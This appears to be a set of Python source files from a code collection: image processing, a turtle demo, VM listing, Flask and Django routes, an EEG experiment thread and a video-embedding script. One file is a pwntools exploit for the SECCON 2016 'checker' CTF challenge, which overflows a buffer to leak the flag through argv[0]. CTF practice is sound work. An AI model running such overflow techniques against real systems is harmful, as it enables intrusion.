sweep_results_folder.split('_')[1]\n if not os.path.exists(os.path.join(self.path, \"image\" + str(i) + \".npy\")) or force_processing:\n\n\n current = np.genfromtxt(os.path.join(self.path, \"current\" + str(i) + \".txt\"))\n potential = np.genfromtxt(os.path.join(self.path, \"potential\" + str(i) + \".txt\"))\n\n u_junc = potential - (current - potential * self.run_data['rho_par_0']) * self.run_data[\n 'r_int_0'] * 0.0001\n luminance = np.exp(u_junc / self.run_data['ideality_factor'] / 0.0238)\n luminance[current == 0] = 0\n luminance = cv2.resize(luminance, (500, 450),interpolation=cv2.INTER_AREA)\n luminance = post_process_image(self.noise_folder,luminance,blur=blur,factor=noise_factor)\n luminance = cv2.resize(luminance, image_dim,interpolation=cv2.INTER_AREA)\n np.save(os.path.join(self.path, \"image\" + str(i) + \".npy\"), luminance)\n try:\n temperature = np.genfromtxt(os.path.join(self.path, \"temperature\" + str(i) + \".txt\"))\n temperature = cv2.resize(temperature, (500, 450),interpolation=cv2.INTER_AREA)\n temperature = cv2.resize(temperature, image_dim,interpolation=cv2.INTER_AREA)\n np.save(os.path.join(self.path, \"image_th\" + str(i) + \".npy\"), temperature)\n except:\n pass\n if os.path.exists(os.path.join(self.path, \"current\" + str(i) + \".txt\")):\n os.remove(os.path.join(self.path, \"current\" + str(i) + \".txt\"))\n\n if os.path.exists(os.path.join(self.path, \"potential\" + str(i) + \".txt\")):\n os.remove(os.path.join(self.path, \"potential\" + str(i) + \".txt\"))\n\n if os.path.exists(os.path.join(self.path, \"temperature\" + str(i) + \".txt\")):\n os.remove(os.path.join(self.path, \"temperature\" + str(i) + \".txt\"))\n\n def get_export_image(self, image_size=(60, 70), v1=0.55, v2=0.65, blur=5, factor=14364764):\n full_image = []\n\n img1 = cv2.resize(self.get_image(v=v1), (500, 450))\n img1noise = post_process_image(self.noise_folder,img1, blur=blur, factor=factor) # 14272973\n img_norm = np.log(img1noise / np.mean(np.mean(img1noise))) * 0.0238 + v1\n img1re = cv2.resize(img_norm, image_size).astype(np.float32)\n # [:40,20:40]\n\n img2 = cv2.resize(self.get_image(v=v2), (500, 450))\n img2 = post_process_image(self.noise_folder,img2, blur=blur, factor=factor) # 14272973\n # img2 = img2/np.mean(np.mean(img1)) + gauss/np.mean(np.mean(img1))*np.mean(np.mean(img2))\n img2 = np.log(img2 / np.mean(np.mean(img1))) * 0.0238 + v1\n\n img2 = cv2.resize(img2, image_size).astype(np.float32)\n\n if np.count_nonzero(np.isnan(img1re)) == 0 and np.count_nonzero(np.isnan(img2)) == 0:\n full_image.append(img1re.reshape(image_size[1], image_size[0], 1).tolist())\n full_image.append(img2.reshape(image_size[1], image_size[0], 1).tolist()) # [:40,20:40]\n\n return full_image\n else:\n return None\n\n\n def get_image(self, v, isc=0):\n\n try:\n image1str = str(\n self.data[np.isclose(self.data['isc'], isc, atol=1e-4) & np.isclose(self.data['v'], v, atol=1e-4)][\n 'sweep'].to_list()[0]).split('_')[1]\n except:\n print(1)\n image1 = np.load(os.path.join(self.path, \"image\" + str(image1str) + \".npy\"))\n return image1\n\n\n\n\n","sub_path":"data_generation/lib/laoss_results.py","file_name":"laoss_results.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"553338918","text":"# import libraries\nimport turtle\n\n# create turtle drawing palette\nt = turtle.Pen()\n\n# define function to draw shape\ndef draw_shape():\n\n # calculate start position\n start_x = x - (size/2)\n start_y = y - (size/2)\n\n # set pen up\n t.penup()\n\n # move to start position\n t.goto(start_x, start_y)\n\n # draw shape\n t.pendown()\n t.setheading(0)\n for i in range(sides):\n t.forward(size)\n t.left(360/sides)\n\n# open file\nfh = open(\"file.txt\", 'r')\n\n# read the lines\nrecords = fh.readlines()\n\n# using a for loop, break each line down\nfor record in records:\n\n # get rid of the trailing \\n at the end of the file\n record = record.strip()\n\n # split the line into the parts\n x, y, sides, size = record.split(',')\n\n #turn integers back into integers\n x = int(x)\n y = int(y)\n sides = int(sides)\n size = int(size)\n\n # draw shape\n draw_shape()\n\nfh.close()\n","sub_path":"demos/file_io/turtle_driver/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"267723399","text":"#!/usr/bin/python2\n# Source: https://bannsecurity.com/index.php/home/10-ctf-writeups/39-seccon-2016-checker\n\nfrom pwn import *\n\nelf = ELF(\"checker\")\n\np = process(\"checker\")\n#p = remote(\"checker.pwn.seccon.jp\",14726)\n\np.recvuntil(\"NAME : \")\np.sendline(\"Blerg\") # This doesn't matter\n\n# Adjust as necessary\nargv0_off = 376\n\n# Zero out argv[0]\nfor i in range(8):\n p.recvuntil(\">> \")\n p.sendline(\"A\"*(argv0_off+8-i))\n\n# Now we can say yes\np.sendline(\"yes\")\n\n\n# Send the address of the flag to argv[0] to have the error message leak the flag for us.\np.sendline(cyclic(argv0_off,n=8) + p64(elf.symbols['flag']))\n\np.interactive()\n","sub_path":"challenges/random_seccon2016_checker/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481603520","text":"import os\noutput=os.popen(\"virsh list --all\").readlines()\ndef list_machines(vm_list=None):\n machines=dict()\n if input:\n vm_list=vm_list[2:]\n for machine_string in vm_list:\n machine_line_splitted = machine_string.split()\n if len(machine_line_splitted) > 0:\n vm_name=machine_line_splitted[1]\n machine_status = \"\"\n for status in machine_line_splitted[2:]:\n machine_status += status\n machines[vm_name]=dict()\n machines[vm_name]['status']=machine_status\n return machines\n\ndef list_interfaces(machine):\n output=os.popen(\"virsh domiflist %s\" % ( machine) ).readlines()\n interfaces_list=output[2:]\n interfaces = list()\n for interface_line in interfaces_list:\n interface = interface_line.split()\n if len(interface) > 0: # we have a line, it's not an empty line\n interface_name=interface[0]\n interface_mac=interface[4]\n interfaces.append([interface_name,interface_mac])\n return interfaces\n\n\nmachines=list_machines(output)\nfor machine in machines.keys():\n interface = list_interfaces(machine)\n machines[machine]['network']=interface\n\nfor machine in machines:\n print(\"%-20s is %-5s with Network device %-5s and network mac %s\" % (machine,machines[machine]['status'],\n machines[machine]['network'][0][0],machines[machine]['network'][0][1]))\n","sub_path":"python/list_machines.py","file_name":"list_machines.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"577475990","text":"from flask import jsonify, request, session\n\nimport os, shutil\n\nfrom server import app\nfrom server.database import *\nfrom server.utils import list_access, list_owner, login_required, has_json\n\n# MARK: List routes\n@app.route('/api/lists', methods=['GET'])\n@login_required\ndef get_lists():\n response = {}\n response['lists'] = [l.__dict__ for l in db_get_lists(session.get('userID'))]\n return jsonify(response)\n\n\n@app.route('/api/lists/', methods=['GET'])\n@login_required\n@list_access\ndef get_list(list_id):\n ''' returns the specified list'''\n l = db_get_list(list_id)\n if l == None:\n json_abort(404, \"List not found\")\n return jsonify(l.__dict__)\n\n\n@app.route('/api/lists/', methods=['POST'])\n@login_required\n@has_json\ndef create_list():\n ''' creates a new list '''\n data = request.get_json()\n title = data.get('title')\n\n newList = db_create_list(title, session.get('userID'))\n if newList == None:\n json_abort(500, 'Could not create list')\n\n return jsonify(newList.__dict__), 201\n\n\n@app.route('/api/lists/', methods=['PUT'])\n@login_required\n@list_owner\n@has_json\ndef update_list(list_id):\n l = db_get_list(list_id)\n data = request.get_json()\n\n #Only update if revision is smaller on the server\n if data.get('revision') != None and data.get('revision') < l.revision:\n json_abort(409, 'Newer version of list available')\n\n l.title = (data.get('title'))\n l.revision = l.revision + 1\n\n l = db_update_list(l)\n if l == None:\n json_abort(500, 'Could not update list')\n\n return jsonify(l.__dict__)\n\n\n@app.route('/api/lists/', methods=['DELETE'])\n@login_required\n@list_owner\ndef remove_list(list_id):\n db_delete_list(list_id)\n\n # delete upload file directory\n directory = os.path.join(app.config['UPLOAD_FOLDER'], list_id)\n shutil.rmtree(directory, ignore_errors=True)\n\n return jsonify({'result': True})\n","sub_path":"solutions/server/server-14-login-logout-user/server/routes/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295873436","text":"#!/usr/bin/env python\nfrom setuptools import find_packages, setup\n\nproject = \"microcosm_pubsub\"\nversion = \"0.8.0\"\n\nsetup(\n name=project,\n version=version,\n description=\"PubSub with SNS/SQS\",\n author=\"Globality Engineering\",\n author_email=\"engineering@globality.com\",\n url=\"https://github.com/globality-corp/microcosm-pubsub\",\n packages=find_packages(exclude=[\"*.tests\", \"*.tests.*\", \"tests.*\", \"tests\"]),\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n \"boto3>=1.3.0\",\n \"marshmallow>=2.6.1\",\n \"microcosm>=0.7.0\",\n \"microcosm-daemon>=0.2.0\",\n ],\n setup_requires=[\n \"nose>=1.3.6\",\n ],\n dependency_links=[\n ],\n entry_points={\n \"console_scripts\": [\n \"sns-produce = microcosm_pubsub.main:produce\",\n \"sqs-consume = microcosm_pubsub.main:consume\",\n \"simple-daemon = microcosm_pubsub.main:main\",\n ],\n \"microcosm.factories\": [\n \"pubsub_message_codecs = microcosm_pubsub.codecs:configure_pubsub_message_codecs\",\n \"sqs_consumer = microcosm_pubsub.consumer:configure_sqs_consumer\",\n \"sqs_message_dispatcher = microcosm_pubsub.dispatcher:configure_sqs_message_dispatcher\",\n \"sns_producer = microcosm_pubsub.producer:configure_sns_producer\",\n \"sns_topic_arns = microcosm_pubsub.producer:configure_sns_topic_arns\",\n ]\n },\n tests_require=[\n \"coverage>=3.7.1\",\n \"mock>=1.0.1\",\n \"PyHamcrest>=1.8.5\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613658978","text":"from threading import Thread, Event\nimport os\nimport numpy as np\nfrom pysndfile import PySndfile, sndio\nfrom random import randint, shuffle\nfrom shutil import copyfile\nfrom natsort import natsorted\nimport numpy as np\nimport pandas as pd\nfrom shutil import copy2\n\nfrom test_base import BaseThread\n\nfrom matrix_test.helper_modules.signalops import play_wav\nfrom matrix_test.helper_modules.filesystem import globDir\nfrom scipy.special import logit\nfrom config import socketio\nimport csv\nimport pdb\nimport dill\n\nimport sounddevice as sd\nfrom hearing_loss_sim import apply_hearing_loss_sim\n\nsymb_dict = {\n True: 10003,\n False: 10007\n}\n\ndef set_trace():\n import logging\n log = logging.getLogger('werkzeug')\n log.setLevel(logging.ERROR)\n log = logging.getLogger('engineio')\n log.setLevel(logging.ERROR)\n pdb.set_trace()\n\n\nclass EEGStoryTrainThread(BaseThread):\n '''\n Thread for running server side matrix test operations\n '''\n def __init__(self, sessionFilepath=None,\n stimFolder='./eeg_story_stim/stimulus/', nTrials=2,\n socketio=None, participant=None, srt_50=None, s_50=None):\n self.test_name = 'eeg_story_train'\n self.stimDir = stimFolder\n self.nTrials = nTrials\n self.trial_ind = 0\n\n self.participant = participant\n self.participant_parameters = self.participant.parameters\n\n self.selected_q = []\n self.question = []\n self.answers = [''] * 8\n self.wav_files = []\n self.q_files = []\n\n self._stopevent = Event()\n\n super(EEGStoryTrainThread, self).__init__(self.test_name,\n sessionFilepath=sessionFilepath,\n socketio=socketio,\n participant=participant)\n\n self.toSave = ['trial_ind', 'answers', 'question', 'selected_q', 'nTrials', 'wav_files', 'test_name']\n\n\n self.socketio.on_event('submit_response', self.submitTestResponse, namespace='/main')\n self.socketio.on_event('finalise_results', self.finaliseResults, namespace='/main')\n self.loadStimulus()\n\n self.dev_mode = False\n\n def setQuestion(self, q):\n self.socketio.emit('set_question', data=q[0], namespace='/main')\n\n def testLoop(self):\n '''\n Main loop for iteratively finding the SRT\n '''\n self.waitForPageLoad()\n self.fillTable()\n self.socketio.emit('test_ready', namespace='/main')\n # For each stimulus\n trials = list(zip(self.wav_files, self.question))[self.trial_ind:]\n for (wav, q) in trials:\n self.saveState(out=self.backupFilepath)\n self.displayInstructions()\n self.setQuestion(q)\n self.waitForPartReady()\n if self._stopevent.isSet() or self.finishTest:\n break\n # Play concatenated matrix sentences at set SNR\n\n self.playStimulus(wav)\n self.waitForResponse()\n if self._stopevent.isSet() or self.finishTest:\n break\n self.processResponse()\n self.trial_ind += 1\n self.saveState(out=self.backupFilepath)\n if not self._stopevent.isSet():\n self.unsetPageLoaded()\n self.socketio.emit('processing-complete', namespace='/main')\n self.waitForPageLoad()\n self.fillTable()\n self.waitForFinalise()\n\n def submitTestResponse(self, msg):\n '''\n Get and store participant response for current trial\n '''\n self.answer = msg\n self.newResp = True\n\n def processResponse(self):\n '''\n '''\n self.newResp = False\n self.answers[self.trial_ind] = self.answer\n self.socketio.emit('test_resp', {'trial_ind': self.trial_ind, \"ans\": self.answer}, namespace='/main')\n\n def fillTable(self):\n '''\n '''\n for ind, ans in enumerate(self.answers):\n self.socketio.emit('test_resp', {'trial_ind': ind, \"ans\": ans}, namespace='/main')\n\n def loadStimulus(self):\n '''\n '''\n self.wav_files = natsorted(globDir(self.stimDir, '*.wav'))\n q_files = natsorted(globDir(self.stimDir, '*.csv'))\n for wav_file, q_file in zip(self.wav_files, q_files):\n q_lines = []\n with open(q_file, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n q_lines.append((int(line[0]), line[1:]))\n q_ind = randint(0, len(q_lines)-1)\n self.question.append(q_lines[q_ind][1])\n\n\n def displayInstructions(self):\n self.socketio.emit('display_instructions', namespace='/main')\n\n def playStimulus(self, wav):\n '''\n Output audio stimulus from numpy array\n '''\n self.newResp = False\n self.socketio.emit(\"stim_playing\", namespace=\"/main\")\n x, fs, _ = sndio.read(wav)\n if self.participant.parameters['hl_sim_active']:\n y = apply_hearing_loss_sim(x, fs)\n # Play audio\n if not self.dev_mode:\n sd.play(y, fs, blocking=True)\n else:\n self.play_wav('./da_stim/DA_170.wav', '')\n self.socketio.emit(\"stim_done\", namespace=\"/main\")\n\n # def playStimulus(self, wav_file, replay=False):\n\n # x, fs, _ = sndio.read(wav_file)\n # self.newResp = False\n # self.socketio.emit(\"stim_playing\", namespace=\"/main\")\n # # if not replay:\n # # self.y = self.generateTrial(self.snr)\n # # Play audio\n # # sd.play(self.y, self.fs, blocking=True)\n # if not self.dev_mode:\n # self.play_wav(wav_file, 'finish_test')\n # else:\n # self.play_wav('./da_stim/DA_170.wav', 'finish_test')\n\n # self.socketio.emit(\"stim_done\", namespace=\"/main\")\n\n\n def saveState(self, out=\"test_state.pkl\"):\n saveDict = {k:self.__dict__[k] for k in self.toSave}\n with open(out, 'wb') as f:\n dill.dump(saveDict, f)\n","sub_path":"eeg_story_train_thread.py","file_name":"eeg_story_train_thread.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"643673322","text":"#!/usr/bin/env python\n'''\n@author Luke Campbell \n@file ingestion_management_service_a.py\n@date 06/21/12 17:43\n@description DESCRIPTION\n'''\nfrom pyon.public import PRED, RT\nfrom pyon.util.arg_check import validate_is_instance, validate_true\nfrom interface.services.dm.iingestion_management_service import BaseIngestionManagementService\nfrom interface.objects import IngestionConfiguration, IngestionQueue, StreamQuery\n\n\nclass IngestionManagementService(BaseIngestionManagementService):\n\n def create_ingestion_configuration(self,name='', exchange_point_id='', queues=None):\n validate_is_instance(queues,list,'The queues parameter is not a proper list.')\n validate_true(len(queues)>0, 'Ingestion needs at least one queue to ingest from')\n for queue in queues:\n validate_is_instance(queue, IngestionQueue)\n\n ingestion_config = IngestionConfiguration()\n\n ingestion_config.name = name\n ingestion_config.exchange_point = exchange_point_id\n ingestion_config.queues = queues\n\n config_id, rev = self.clients.resource_registry.create(ingestion_config)\n\n return config_id\n\n def read_ingestion_configuration(self, ingestion_configuration_id=''):\n return self.clients.resource_registry.read(ingestion_configuration_id)\n\n def update_ingestion_configuration(self, ingestion_configuration=None):\n return self.clients.resource_registry.update(ingestion_configuration)\n\n def delete_ingestion_configuration(self, ingestion_configuration_id=''):\n assocs = self.clients.resource_registry.find_associations(subject=ingestion_configuration_id, predicate=PRED.hasSubscription, id_only=False)\n for assoc in assocs:\n self.clients.resource_registry.delete_association(assoc)\n self.clients.pubsub_management.delete_subscription(assoc.o)\n return self.clients.resource_registry.delete(ingestion_configuration_id)\n\n def list_ingestion_configurations(self, id_only=False):\n resources, _ = self.clients.resource_registry.find_resources(restype=RT.IngestionConfiguration,id_only=id_only)\n return resources\n\n\n # --- \n\n def persist_data_stream(self, stream_id='', ingestion_configuration_id='', dataset_id=''):\n # Figure out which MIME or xpath in the stream definition belongs where\n\n # Just going to use the first queue for now\n\n validate_is_instance(stream_id,basestring, 'stream_id %s is not a valid string' % stream_id)\n validate_true(dataset_id,'Clients must specify the dataset to persist')\n\n ingestion_config = self.read_ingestion_configuration(ingestion_configuration_id)\n if self.is_persisted(stream_id):\n raise BadRequest('This stream is already being persisted')\n stream = self.clients.pubsub_management.read_stream(stream_id)\n stream.persisted = True\n self.clients.pubsub_management.update_stream(stream)\n\n ingestion_queue = self._determine_queue(stream_id, ingestion_config.queues)\n\n subscription_id = self.clients.pubsub_management.create_subscription(\n query=StreamQuery(stream_ids=[stream_id]),\n exchange_name=ingestion_queue.name,\n exchange_point=ingestion_config.exchange_point\n )\n\n self.clients.pubsub_management.activate_subscription(subscription_id=subscription_id)\n\n self.clients.resource_registry.create_association(\n subject=ingestion_configuration_id,\n predicate=PRED.hasSubscription,\n object=subscription_id\n )\n self._existing_dataset(stream_id,dataset_id)\n return dataset_id\n\n def unpersist_data_stream(self, stream_id='', ingestion_configuration_id=''):\n subscriptions, assocs = self.clients.resource_registry.find_objects(subject=ingestion_configuration_id, predicate=PRED.hasSubscription, id_only=True)\n\n stream = self.clients.pubsub_management.read_stream(stream_id)\n stream.persisted = False\n self.clients.pubsub_management.update_stream(stream)\n\n for i in xrange(len(subscriptions)):\n subscription = subscriptions[i]\n assoc = assocs[i]\n # Check if this subscription is the one with the stream_id\n\n if len(self.clients.resource_registry.find_associations(subject=subscription, object=stream_id))>0: # this subscription has this stream\n self.clients.pubsub_management.deactivate_subscription(subscription_id=subscription)\n self.clients.resource_registry.delete_association(assoc)\n self.clients.pubsub_management.delete_subscription(subscription)\n\n datasets, _ = self.clients.resource_registry.find_subjects(subject_type=RT.DataSet,predicate=PRED.hasStream,object=stream_id,id_only=True)\n for dataset_id in datasets:\n self.clients.dataset_management.remove_stream(dataset_id, stream_id)\n\n def is_persisted(self, stream_id=''):\n stream = self.clients.pubsub_management.read_stream(stream_id)\n return stream.persisted\n\n def _determine_queue(self,stream_id='', queues=[]):\n # For now just return the first queue until stream definition is defined\n return queues[0]\n\n def _existing_dataset(self,stream_id='', dataset_id=''):\n self.clients.dataset_management.add_stream(dataset_id,stream_id)\n\n\n\n","sub_path":"ion/services/dm/ingestion/ingestion_management_service.py","file_name":"ingestion_management_service.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"586780654","text":"from .BaseCtl import BaseCtl\nfrom django.shortcuts import render\nfrom ORS.utility.DataValidator import DataValidator\nfrom service.forms import CollegeForm\nfrom service.models import College\nfrom service.service.CollegeService import CollegeService\n\n\nclass CollegeListCtl(BaseCtl):\n count = 1\n\n def request_to_form(self, requestForm):\n self.form[\"collegeName\"] = requestForm.get(\"collegeName\", None)\n self.form[\"collegeAddress\"] = requestForm.get(\"collegeAddress\", None)\n self.form[\"collegeState\"] = requestForm.get(\"collegeState\", None)\n self.form[\"collegeCity\"] = requestForm.get(\"collegeCity\", None)\n self.form[\"collegePhoneNumber\"] = requestForm.get(\"collegePhoneNumber\", None)\n self.form[\"ids\"] = requestForm.getlist(\"ids\", None)\n\n def display(self, request, params={}):\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n res = render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n return res\n\n def next(self, request, params={}):\n CollegeListCtl.count += 1\n self.form[\"pageNo\"] = CollegeListCtl.count\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n res = render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n return res\n\n def previous(self, request, params={}):\n CollegeListCtl.count -= 1\n self.form[\"pageNo\"] = CollegeListCtl.count\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n res = render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n return res\n\n def submit(self, request, params={}):\n self.request_to_form(request.POST)\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n res = render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n return res\n\n def get_template(self):\n return \"ors/CollegeList.html\"\n\n # Service of College\n\n def get_service(self):\n return CollegeService()\n\n def deleteRecord(self, request, params={}):\n CollegeListCtl.count += 1\n self.form[\"pageNo\"] = 1\n if (bool(self.form[\"ids\"]) == False):\n self.form[\"error\"] = True\n self.form[\"message\"] = \"Please Select at least one check box\"\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n return render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n else:\n for ids in self.form[\"ids\"]:\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n id = int(ids)\n if (id > 0):\n r = self.get_service().get(id)\n if r is not None:\n self.get_service().delete(r.id)\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n self.form[\"pageNo\"] = 1\n self.form[\"error\"] = False\n self.form[\"message\"] = \"DATA IS SUCCESSFULLY DELETED\"\n return render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n else:\n self.form[\"error\"] = True\n self.form[\"message\"] = \"Data is not deleted\"\n return render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n","sub_path":"ORS/ctl/CollegeListCtl.py","file_name":"CollegeListCtl.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"653703250","text":"# -*- coding: UTF-8 -*-\n\nfrom django.contrib import admin\nfrom django.contrib.auth.models import Group\nfrom django.db.models import Count\nfrom django.utils.encoding import smart_text\nfrom .models import UserPreferences, SHIRT_TYPES_CHOICES, Organization, Participant, Waiting\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n list_display = ('get_full_name', 'email')\n\n\nclass RoomsFilter(admin.SimpleListFilter):\n # Human-readable title which will be displayed in the\n # right admin sidebar just above the filter options.\n title = 'posiada pokój'\n\n # Parameter for the filter that will be used in the URL query.\n parameter_name = 'room'\n\n def lookups(self, request, model_admin):\n \"\"\"\n Returns a list of tuples. The first element in each\n tuple is the coded value for the option that will\n appear in the URL query. The second element is the\n human-readable name for the option that will appear\n in the right sidebar.\n \"\"\"\n return (\n ('Yes', 'Tak'),\n ('No', 'Nie'),\n )\n\n def queryset(self, request, queryset):\n \"\"\"\n Returns the filtered queryset based on the value\n provided in the query string and retrievable via\n `self.value()`.\n \"\"\"\n # Compare the requested value (either '80s' or '90s')\n # to decide how to filter the queryset.\n if self.value() == 'Yes':\n return queryset.annotate(num_rooms=Count('user__userinroom')).filter(num_rooms=1)\n if self.value() == 'No':\n return queryset.annotate(num_rooms=Count('user__userinroom')).filter(num_rooms=0)\n\n\nclass UserPreferencesAdmin(admin.ModelAdmin):\n list_per_page = 400\n list_display = ('user_name', 'user_email', 'org',\n 'days',\n 'breakfasts',\n 'dinners',\n 'vegetarian',\n 'shirt',\n 'bus',\n 'want_bus',\n 'ZOSIA_cost',\n 'paid',\n 'minutes_early', 'date_joined',\n 'last_login')\n list_filter = ['bus_hour', 'paid', 'bus', 'want_bus', RoomsFilter, 'breakfast_2', 'breakfast_3',\n 'breakfast_4', 'dinner_1', 'dinner_2', 'dinner_3', 'day_1', 'day_2', 'day_3', 'shirt_size', 'shirt_type', 'org']\n list_editable = ('minutes_early', 'paid')\n list_select_related = ('user',)\n\n def user_name(self, item):\n return smart_text(item.user.get_full_name())\n\n def user_email(self, item):\n return str(item.user.email)\n\n def date_joined(self, obj):\n return obj.user.date_joined\n date_joined.short_description = 'date_joined'\n date_joined.admin_order_field = 'user__date_joined'\n\n def last_login(self, obj):\n return obj.user.last_login\n last_login.short_description = 'last_login'\n last_login.admin_order_field = 'user__last_login'\n\n def anim_icon(self,id):\n return '\"loading\"'%id\n yes_icon = '\"Yes\"'\n no_icon = '\"No\"'\n def onclick(self,id,obj):\n return \"\"\"if(confirm('Do you want to register payment from %s?')) {\n document.getElementById('anim%s').style.display='inline';\n xhr = new XMLHttpRequest();\n xhr.onreadystatechange = function() {\n if(xhr.readyState == 4) {\n document.getElementById('anim%s').style.display='none';\n if( xhr.status == 200) {\n window.location.reload();\n }\n }\n };\n xhr.open('POST', '/admin/register_payment/', true);\n xhr.send('id=%s');\n }\"\"\" % (obj, id, id, id)\n def bus_onclick(self,obj):\n id = obj.id\n return \"\"\"if(confirm('Do you want to register transport payment from %s?')) {\n //document.getElementById('anim%s').style.display='inline';\n xhr = new XMLHttpRequest();\n xhr.onreadystatechange = function() {\n if(xhr.readyState == 4) {\n //document.getElementById('anim%s').style.display='none';\n if( xhr.status == 200) {\n window.location.reload();\n }\n }\n };\n xhr.open('POST', '/admin/register_bus_payment/', true);\n xhr.send('id=%s');\n }\"\"\" % (obj, id, id, id)\n\n\n def ZOSIA_cost(self, obj):\n if obj.paid:\n return \"%s %s z\\u0142\" % ( self.yes_icon, obj.count_payment() )\n else:\n return '%s %s z\\u0142 %s' % (\n self.onclick(obj.id,obj), self.no_icon, obj.count_payment(), self.anim_icon(obj.id))\n ZOSIA_cost.allow_tags = True\n\n def bus_cost(self, obj):\n # if user doesn't wanna get but, so he shouldn't\n if not obj.bus:\n return \"%s -\" % self.no_icon\n elif obj.paid_for_bus:\n return \"%s %s z\\u0142\" % ( self.yes_icon, \"40\" )\n else:\n return '%s %s z\\u0142' % ( self.bus_onclick(obj), self.no_icon, \"40\" )\n bus_cost.allow_tags = True\n\n shirt_types = {}\n for i in 0,1:\n v = SHIRT_TYPES_CHOICES.__getitem__(i)\n shirt_types[v.__getitem__(0)] = v.__getitem__(1)\n def shirt(self, obj):\n return \"%s (%s)\" % (\n self.shirt_types[obj.shirt_type],\n obj.shirt_size)\n\n def f(self,o):\n def g(x):\n if o.__dict__[x]: return self.yes_icon\n else: return self.no_icon\n return g\n # note: these three methods should not be separated\n # but generated through lamba function\n # do it in spare time\n def breakfasts(self,obj):\n lst = ['breakfast_2', 'breakfast_3', 'breakfast_4']\n return \" \".join(map(self.f(obj),lst))\n breakfasts.allow_tags = True\n\n def dinners(self,obj):\n lst = ['dinner_1', 'dinner_2', 'dinner_3']\n return \" \".join(map(self.f(obj),lst))\n dinners.allow_tags = True\n\n def days(self,obj):\n lst = ['day_1', 'day_2', 'day_3']\n return \" \".join(map(self.f(obj),lst))\n days.allow_tags = True\n\n\nclass OrganizationAdmin(admin.ModelAdmin):\n list_display = ('name', 'accepted')\n\nclass WaitingAdmin(admin.ModelAdmin):\n list_display = ('user', 'day_1', 'day_2', 'day_3')\n\nadmin.site.unregister(Group)\nadmin.site.register(Waiting, WaitingAdmin)\nadmin.site.register(UserPreferences, UserPreferencesAdmin)\nadmin.site.register(Organization, OrganizationAdmin)\nadmin.site.register(Participant, ParticipantAdmin)\n","sub_path":"wsgi/zosiaproject/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"329566878","text":"import torch as th\nimport numpy as np\nfrom s3dg import S3D\nimport numpy as np\n\ndef main():\n # see model input data\n # data = np.load('s3d_dict.npy')\n\n # Instantiate the model\n net = S3D('s3d_dict.npy', 512)\n\n # Load the model weights\n net.load_state_dict(th.load('s3d_howto100m.pth'))\n\n # Video input should be of size Batch x 3 x T x H x W and normalized to [0, 1]\n # video1 = th.rand(2, 3, 32, 224, 224)\n # print(video1.shape)\n # print(type(video1))\n video = th.from_numpy(np.load(\"../video_feature_extractor/output/_0flfBHjVKU_features.npy\"))\n print(video.shape)\n print(type(video))\n\n # Evaluation mode\n net = net.eval()\n\n # Video inference\n '''\n video_output is a dictionary containing two keys:\n\n video_embedding: This is the video embedding (size 512) from the joint text-video space. \n It should be used to compute similarity scores with text inputs using the text embedding.\n \n mixed_5c: This is the global averaged pooled feature from S3D of dimension 1024. \n This should be use for classification on downstream tasks.\n '''\n video_output = net(video)\n print(video_output['mixed_5c'])\n print(video_output['mixed_5c'].shape)\n print(type(video_output['mixed_5c']))\n #\n # # Text inference\n # text_output = net.text_module(['open door', 'cut tomato'])\n\n # print(text_output)\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"211879689","text":"import csv\nfrom collections import namedtuple\n\nfrom kivy.app import App\nfrom kivy.clock import Clock\nfrom kivy.metrics import dp\nfrom kivy.utils import platform\nfrom kivy.logger import Logger, LOG_LEVELS\nLogger.setLevel(LOG_LEVELS['debug'])\nfrom kivy.properties import *\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.filechooser import FileChooserListView\n\nfrom kivymd.theming import ThemeManager\nfrom 